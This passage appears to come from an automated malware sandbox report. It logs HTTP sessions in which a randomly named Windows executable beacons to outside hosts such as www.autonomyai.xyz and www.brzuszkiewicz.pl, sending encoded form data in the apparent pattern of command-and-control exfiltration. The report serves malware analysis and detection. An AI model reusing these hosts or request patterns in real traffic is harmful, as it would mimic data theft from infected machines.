FNPd=hrhsBV1iy8Jt0rcCkFJvC7FqqNRn2km08Z3A45KF+tVEq+ErtTBqzHgq3+yxM9tHbtM0sk7daTg5U9U+omZGRA5CyInDhBB506B+zBBBD1YGFOqgTAkJIh2wKwQPv9ZeR2gQZtDfxqNOsDapuIB9/gDDp/4x7A9MSFNixaSyROaHbJBaN4SzEHSN8RRzyGsmGWkj7Yksk15Getz1/eBBTwYid0CuVhwekdFMPM12rXMo/KcEurWohiJqHr13E4Qj5AZ2cYPvpW2mBUmiXB9cPKQ3JHq3n+KloYCCqiyb0aIOriEtp6NmhdKSdqQXAudmTGOKpocdNCxPU5d+VGW9mrbOwW3j2DihAlHdfeLAsyFEP9TaqESTYKLx18eTlY03qyK3qOnlnLEQ0h4YBJXxoQRCOzKNj7Mmsf69bsZO2+/RyJFOYbgGpWnXacoMt2FWRI8ncdk+m7qE8LUuCSGEwvVvbhySrOUiBftnjClT6ngQ/EM0C4EkyJF3nPe8rCE+JOUAD9pr5BsvrSKlnvtv4COfqLkL6SNAQnfYWG1OmeJp7dopAkci+6YfHg+L5JfHZepW+0SnDhI6cPI8Hr8hWC54R+fZqvYtuICLhCP5aJD3s8SMU4TPJLE8xCWMFxhw+Q1akgdldb8tD5J8WFH5EF4MO+xHfUXGroRkSnD4ZcbpfngXYwecDpJrvRjBcB2Sj5wQ6/f69uSWI9BZ2hu26mQErO47iO6e2TwbiU2WNZj32kmhyplXpYrsfZ7oDsK1RHpU17JeEpchfa7xutwynQq+0ERD/Sp5d6r7LHLpaKjyzjBSbg7QIAVNTELwz13GJoOjyFxdWx6KarqCjj0mDrEH4wCj5lZoBtSl9prSkdIlThktkQ/b6mljtoou5YaMiij6QDjzdeoEV0XGn7wFutjumoDQwh0XHmhNePJhK2CQbaLRdOXGPlnQCfz2IDfAeeQF6Isc0O2/v88AhCGQ/gIKCXGFg0V0J6MqHwBKVNVWJGK [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.6497303.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:23.881931067 CEST501OUTGET /vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.badcopsinyourtown.info
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:20:24.347069025 CEST418INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:20:24 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 73 70 4a 4d 43 6c 41 77 7a 66 38 56 72 34 74 55 2f 43 4e 46 4d 49 77 61 72 74 49 6d 6a 6e 75 58 34 35 6e 48 30 65 2b 61 2f 74 38 6d 6e 4a 67 70 74 6a 67 62 77 33 74 6a 33 65 6a 49 4a 2f 46 4d 4c 35 46 48 33 77 37 6b 56 56 35 2f 58 39 6b 67 2b 33 67 45 66 6a 78 68 6b 5a 37 5a 6b 54 70 71 6c 59 46 6a 34 78 45 73 47 45 55 51 64 38 79 5a 57 51 38 55 64 78 6d 41 65 53 31 59 6d 72 4e 54 50 55 6b 4a 58 35 51 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.6497313.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:29.405294895 CEST748OUTPOST /nvvv/ HTTP/1.1
                                  Host: www.autonomyai.xyz
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.autonomyai.xyz
                                  Referer: http://www.autonomyai.xyz/nvvv/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 45 42 41 39 67 51 71 58 75 47 4d 64 54 76 4b 5a 2b 4f 41 64 38 5a 52 48 68 79 2f 35 52 2f 65 6b 51 33 72 76 68 77 62 52 6b 75 55 37 53 48 57 52 46 6c 2b 79 4a 78 50 43 4b 55 4a 51 62 5a 79 4f 7a 6b 56 62 57 31 33 65 58 71 75 31 6d 46 38 68 35 67 67 4a 49 63 5a 30 66 74 2b 67 44 48 73 37 4d 43 65 64 77 34 55 64 71 58 5a 50 67 48 6d 35 78 32 2b 37 38 42 6c 71 30 73 70 6e 70 65 68 77 65 50 59 57 33 35 59 39 6a 65 64 44 4f 37 66 46 48 57 2f 32 4f 34 6d 69 36 4d 54 4f 4a 44 5a 6c 4d 2f 79 32 69 72 68 35 78 2b 38 35 4d 56 70 6e 37 67 64 4a 67 6d 38 48 33 56 30 2f 66 32 50 70 70 6f 63 58 61 37 6d 39 36 42 56 30
                                  Data Ascii: FNPd=EBA9gQqXuGMdTvKZ+OAd8ZRHhy/5R/ekQ3rvhwbRkuU7SHWRFl+yJxPCKUJQbZyOzkVbW13eXqu1mF8h5ggJIcZ0ft+gDHs7MCedw4UdqXZPgHm5x2+78Blq0spnpehwePYW35Y9jedDO7fFHW/2O4mi6MTOJDZlM/y2irh5x+85MVpn7gdJgm8H3V0/f2PppocXa7m96BV0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.6497323.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:31.945274115 CEST772OUTPOST /nvvv/ HTTP/1.1
                                  Host: www.autonomyai.xyz
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.autonomyai.xyz
                                  Referer: http://www.autonomyai.xyz/nvvv/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 45 42 41 39 67 51 71 58 75 47 4d 64 53 4b 43 5a 34 74 6f 64 37 35 52 45 6b 79 2f 35 4b 76 65 6f 51 33 76 76 68 78 76 42 6e 63 77 37 54 69 79 52 45 67 53 79 4b 78 50 43 46 30 4a 52 45 4a 79 2f 7a 6b 59 75 57 30 62 65 58 71 36 31 6d 41 51 68 35 54 49 4b 4a 4d 5a 4d 5a 74 2b 69 4d 6e 73 37 4d 43 65 64 77 34 42 56 71 58 68 50 6a 7a 69 35 79 54 4b 34 69 52 6c 74 7a 73 70 6e 74 65 67 35 65 50 5a 44 33 34 55 58 6a 64 6c 44 4f 35 58 46 48 6a 54 31 56 6f 6d 6b 2b 4d 53 46 45 42 38 4f 47 4f 72 43 69 49 42 63 68 5a 6c 44 4a 6a 6f 39 6e 54 64 71 79 32 63 46 33 58 73 4e 66 57 50 44 72 6f 6b 58 49 73 71 61 31 31 77 58 2f 78 74 4e 54 73 36 36 63 4a 48 48 78 71 6a 2b 69 4e 6d 31 4f 41 3d 3d
                                  Data Ascii: FNPd=EBA9gQqXuGMdSKCZ4tod75REky/5KveoQ3vvhxvBncw7TiyREgSyKxPCF0JREJy/zkYuW0beXq61mAQh5TIKJMZMZt+iMns7MCedw4BVqXhPjzi5yTK4iRltzspnteg5ePZD34UXjdlDO5XFHjT1Vomk+MSFEB8OGOrCiIBchZlDJjo9nTdqy2cF3XsNfWPDrokXIsqa11wX/xtNTs66cJHHxqj+iNm1OA==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.6497333.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:34.479114056 CEST1785OUTPOST /nvvv/ HTTP/1.1
                                  Host: www.autonomyai.xyz
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.autonomyai.xyz
                                  Referer: http://www.autonomyai.xyz/nvvv/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 45 42 41 39 67 51 71 58 75 47 4d 64 53 4b 43 5a 34 74 6f 64 37 35 52 45 6b 79 2f 35 4b 76 65 6f 51 33 76 76 68 78 76 42 6e 63 34 37 54 52 4b 52 47 44 71 79 4c 78 50 43 4d 55 4a 4d 45 4a 79 59 7a 67 39 6d 57 30 48 6b 58 6f 43 31 6e 69 59 68 78 43 49 4b 48 4d 5a 4d 62 74 2b 68 44 48 74 7a 4d 47 37 57 77 34 52 56 71 58 68 50 6a 31 4f 35 6d 32 2b 34 67 52 6c 71 30 73 70 72 70 65 67 56 65 50 42 54 33 34 51 74 69 73 46 44 41 36 2f 46 55 46 48 31 5a 6f 6d 6d 79 73 53 57 45 42 41 52 47 4f 47 37 69 4a 6c 6d 68 65 56 44 4c 6b 6c 52 2f 41 35 52 70 31 6b 66 70 6b 56 70 48 69 48 6b 71 37 77 4e 4c 39 69 34 79 57 63 4a 35 58 5a 4a 58 73 6e 70 66 35 37 49 7a 63 79 35 6f 63 58 47 64 68 2f 57 2f 47 55 62 4d 6a 35 35 4d 72 5a 50 49 66 4a 48 6b 77 2b 35 36 48 61 6d 68 34 33 56 76 48 42 66 79 55 4a 68 57 61 5a 37 32 74 58 71 48 2b 53 67 62 76 46 43 31 5a 50 6c 37 74 2b 38 62 6e 34 6a 6f 35 62 4a 67 66 39 4b 63 6c 59 37 71 4c 4b 4a 78 76 68 48 43 2f 34 4c 48 4e 63 72 76 6e 33 44 74 57 31 50 6b 63 50 59 46 [TRUNCATED]
                                  Data Ascii: FNPd=EBA9gQqXuGMdSKCZ4tod75REky/5KveoQ3vvhxvBnc47TRKRGDqyLxPCMUJMEJyYzg9mW0HkXoC1niYhxCIKHMZMbt+hDHtzMG7Ww4RVqXhPj1O5m2+4gRlq0sprpegVePBT34QtisFDA6/FUFH1ZommysSWEBARGOG7iJlmheVDLklR/A5Rp1kfpkVpHiHkq7wNL9i4yWcJ5XZJXsnpf57Izcy5ocXGdh/W/GUbMj55MrZPIfJHkw+56Hamh43VvHBfyUJhWaZ72tXqH+SgbvFC1ZPl7t+8bn4jo5bJgf9KclY7qLKJxvhHC/4LHNcrvn3DtW1PkcPYF06Zo7oFuySxLQf0rAzm/o8KJJFIUiZ5SdiR7afC5R+Qp1/GbiN0FIqWC3voWAVHmr3sNKKws/Y0/Qk9kAfyioLSRuPjqSh9A0Wg0XaWP/fOHx9c65g6jKRUYNS5FE0MdzAgv2deKTjLru2ncwOxG8Z8gK6KaIoFVmZOolCHUpF6Wfa4qgxcLWKUV787X3/yBFQKDcJ6LK9igRa/jegazPZusmalyiI3qPRJRFplJrFpeYiLM0nOXqDxgFUc6oXTz1gE3Vg+Tek342u/5d9B9odeZtlrIKfwUd2q7iiZr4kLljtzulKIACFYvNzFb+hxNWw9+RS3epTr0AsypPnfn8XUIkI2pk53VzKPetPwIQJA8WHfB2WXRPdnd9EDat76nbUtebgQkHWgKHKiy1G8Oggz5FWkYWkijPhuJTKAQ1oXlDKM0c3X4tyhP25UrKYExCLb6wbz8l3OJgXqcGLuNW2x686IjHwATcGbfcCo67amrw0MShpbUSQ2ngdQV3eCrPoKR0+yYK0997tlyTh5Hdn28XzZbWTlxIltHuBS4jSGzYytt21iHHjQM8vn8BMM6vzKAgkXoTVvJ84d5f7pqYz6KsrC172Qw2KEQC7YIVbxmNti5YfDCC4KCCDl2ItMi6abMmb8q2CVt5gx6Ut3xKAWmUO5X/S/9T1 [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.6497343.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:37.057490110 CEST493OUTGET /nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.autonomyai.xyz
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:20:37.767565966 CEST418INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:20:37 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 4a 44 6f 64 6a 6c 57 6b 6b 30 6c 63 4e 63 54 39 7a 4d 30 53 32 34 46 6c 73 51 53 2f 65 4d 71 61 63 51 54 56 75 43 4c 37 6a 2b 55 6e 53 58 66 54 4f 56 37 78 4e 6b 2f 55 44 69 4a 71 4c 34 43 51 39 77 77 70 45 69 72 68 49 63 62 38 6a 77 59 41 37 42 6f 32 48 76 5a 51 4e 74 54 43 4c 43 45 4e 43 46 33 62 36 35 6f 46 32 51 78 6e 6f 6c 4f 36 69 56 57 74 71 77 56 6f 70 74 35 51 71 76 30 46 59 4d 4a 2f 32 65 38 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.649735185.253.212.22803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:42.874552011 CEST754OUTPOST /xf32/ HTTP/1.1
                                  Host: www.brzuszkiewicz.pl
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.brzuszkiewicz.pl
                                  Referer: http://www.brzuszkiewicz.pl/xf32/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 50 33 4f 48 55 61 58 73 75 46 62 35 32 67 2f 78 43 56 48 6b 52 2f 67 73 6c 62 38 51 6f 56 74 4a 73 44 77 69 31 6d 39 4d 74 55 56 58 64 38 72 68 6d 32 55 7a 6a 71 4e 53 51 33 56 43 6c 78 41 44 30 33 5a 69 46 36 38 4b 43 30 71 41 53 2f 4b 2b 41 68 78 43 54 44 4f 66 38 59 43 31 5a 38 4d 4c 33 70 65 67 53 30 66 37 64 4b 55 49 37 6e 61 49 67 6e 74 34 6d 48 6e 41 2f 50 4e 67 65 78 4e 51 52 39 30 67 6b 38 42 2b 64 49 71 74 59 38 64 50 6a 64 4c 31 6f 6a 72 39 64 44 69 46 70 6a 2b 54 57 69 6c 5a 6c 32 57 52 52 47 6e 6e 48 6e 49 65 5a 61 50 77 6f 78 55 63 56 41 42 67 41 50 49 41 6d 63 47 4b 7a 72 67 4c 79 56 54 44
                                  Data Ascii: FNPd=P3OHUaXsuFb52g/xCVHkR/gslb8QoVtJsDwi1m9MtUVXd8rhm2UzjqNSQ3VClxAD03ZiF68KC0qAS/K+AhxCTDOf8YC1Z8ML3pegS0f7dKUI7naIgnt4mHnA/PNgexNQR90gk8B+dIqtY8dPjdL1ojr9dDiFpj+TWilZl2WRRGnnHnIeZaPwoxUcVABgAPIAmcGKzrgLyVTD
                                  May 23, 2024 15:20:43.549030066 CEST289INHTTP/1.1 403 Forbidden
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:20:43 GMT
                                  Content-Type: text/html
                                  Content-Length: 146
                                  Connection: close
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.649736185.253.212.22803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:45.419533968 CEST778OUTPOST /xf32/ HTTP/1.1
                                  Host: www.brzuszkiewicz.pl
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.brzuszkiewicz.pl
                                  Referer: http://www.brzuszkiewicz.pl/xf32/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 50 33 4f 48 55 61 58 73 75 46 62 35 32 41 50 78 45 79 54 6b 54 66 67 76 37 4c 38 51 69 31 74 33 73 45 34 69 31 6d 55 58 74 47 78 58 64 63 37 68 6e 33 55 7a 69 71 4e 53 49 48 55 4a 71 52 41 4d 30 33 56 41 46 37 73 4b 43 30 57 41 53 2b 36 2b 44 57 6c 42 42 6a 4f 64 77 34 44 7a 57 63 4d 4c 33 70 65 67 53 30 4b 51 64 4b 38 49 37 58 4b 49 6d 43 5a 2f 6c 48 6e 48 70 66 4e 67 55 52 4e 55 52 39 30 43 6b 38 78 48 64 4f 6d 74 59 38 4e 50 6b 50 76 79 68 6a 71 30 5a 44 6a 4d 68 69 48 78 4d 52 49 6a 72 56 6a 7a 41 55 6e 37 47 52 4a 45 46 70 50 54 36 68 30 65 56 43 5a 53 41 76 49 71 6b 63 2b 4b 68 38 73 73 39 68 32 67 6b 4b 4a 57 58 38 69 6c 2b 74 59 35 30 41 69 31 6d 56 58 52 4a 41 3d 3d
                                  Data Ascii: FNPd=P3OHUaXsuFb52APxEyTkTfgv7L8Qi1t3sE4i1mUXtGxXdc7hn3UziqNSIHUJqRAM03VAF7sKC0WAS+6+DWlBBjOdw4DzWcML3pegS0KQdK8I7XKImCZ/lHnHpfNgURNUR90Ck8xHdOmtY8NPkPvyhjq0ZDjMhiHxMRIjrVjzAUn7GRJEFpPT6h0eVCZSAvIqkc+Kh8ss9h2gkKJWX8il+tY50Ai1mVXRJA==
                                  May 23, 2024 15:20:46.074805975 CEST289INHTTP/1.1 403 Forbidden
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:20:45 GMT
                                  Content-Type: text/html
                                  Content-Length: 146
                                  Connection: close
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.649737185.253.212.22803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:47.945456028 CEST1791OUTPOST /xf32/ HTTP/1.1
                                  Host: www.brzuszkiewicz.pl
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.brzuszkiewicz.pl
                                  Referer: http://www.brzuszkiewicz.pl/xf32/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 50 33 4f 48 55 61 58 73 75 46 62 35 32 41 50 78 45 79 54 6b 54 66 67 76 37 4c 38 51 69 31 74 33 73 45 34 69 31 6d 55 58 74 47 35 58 64 75 44 68 6e 55 38 7a 6c 71 4e 53 57 33 55 4b 71 52 41 72 30 33 64 45 46 2b 30 77 43 79 53 41 53 59 4f 2b 4c 44 4a 42 4b 6a 4f 64 74 49 43 30 5a 38 4d 65 33 70 4f 6b 53 30 61 51 64 4b 38 49 37 53 4f 49 6d 58 74 2f 6f 6e 6e 41 2f 50 4e 6b 65 78 4e 73 52 39 74 39 6b 39 46 49 64 2b 47 74 5a 63 39 50 6d 39 33 79 75 6a 71 36 56 6a 6a 55 68 6a 37 48 4d 52 55 56 72 56 6d 6d 41 55 6a 37 48 33 34 47 66 71 72 52 69 47 63 53 57 54 64 49 59 4c 45 39 68 2b 69 57 74 4b 6b 47 69 51 62 4d 6b 50 46 32 63 4e 71 69 7a 72 78 54 39 45 44 53 6f 31 43 46 4c 6b 2f 59 65 71 72 46 4f 68 45 50 75 70 39 65 6d 66 48 71 7a 51 4f 78 71 6f 6f 50 42 37 53 33 66 36 4a 45 53 43 77 4e 75 4e 63 42 6e 67 74 44 54 76 65 35 54 6e 71 45 71 35 63 59 73 72 79 43 70 59 6b 37 35 49 44 4c 66 72 65 67 2b 69 64 79 43 4a 56 62 51 56 47 71 6f 51 72 6b 4a 65 61 70 37 63 43 34 49 6c 50 32 6b 67 6f 7a 37 [TRUNCATED]
                                  Data Ascii: FNPd=P3OHUaXsuFb52APxEyTkTfgv7L8Qi1t3sE4i1mUXtG5XduDhnU8zlqNSW3UKqRAr03dEF+0wCySASYO+LDJBKjOdtIC0Z8Me3pOkS0aQdK8I7SOImXt/onnA/PNkexNsR9t9k9FId+GtZc9Pm93yujq6VjjUhj7HMRUVrVmmAUj7H34GfqrRiGcSWTdIYLE9h+iWtKkGiQbMkPF2cNqizrxT9EDSo1CFLk/YeqrFOhEPup9emfHqzQOxqooPB7S3f6JESCwNuNcBngtDTve5TnqEq5cYsryCpYk75IDLfreg+idyCJVbQVGqoQrkJeap7cC4IlP2kgoz74CibNXLPEteiP6AirmMw4mluw9CXsdfuYLPx+B3cEue4NK/CE1aEhcmfUXAhJGzWKW725+rYAJvAgrzccACmACTAlm9eGotaEYRFMxnK6NkHS3sSa/JZXqHwJGXUkiJcHaJgYZwz/l8kKYKLvkEEhDv2oYs3g7u2WxwqGuLn2YBGk5J8bmJH/X48VlBRBhXP5GHM8urE/4n/ABoMGOOB+qRI0Tresi0BiqHcQlMzA/cxjhxjQ8PViw0na7gkV8tUSebLfRKDs2BWPEjXYZt+gGaea4k/sTL/fSiymkr5UIZPE7WSbv5Tm8+0822D9WZ/p7L+unjF41JrCiRQZVEfKgYMb7SS5XJQeT4zwvFJBI4G/IGsHA+xKe/z/EUF6ZuuiQMd53vOecYM8dmlFo0M8WFhJL4Pl1rwanrACbSIWcTgDDArra499ubU89I1vJpb4t4NTnfom75JUFJBhhCFhJGdXbety6tFGM/MgLzp1hXBkxlJYxo4tpXiqwwtbfrEq6IZCckwm6zSsnHbof4wfUpIIGJeuN/TG8t9vA/CTQcPZow5rxawlby2el1G3vS/p30+n7mthlZHtl/9dBIDufKReOHwUtoBwlDUe1vIOSWRw/xxlOamVe/uQBAgi2O1hAAV+5RCex77McEaSh9DakToySohC92NzR [TRUNCATED]
                                  May 23, 2024 15:20:48.639616013 CEST289INHTTP/1.1 403 Forbidden
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:20:48 GMT
                                  Content-Type: text/html
                                  Content-Length: 146
                                  Connection: close
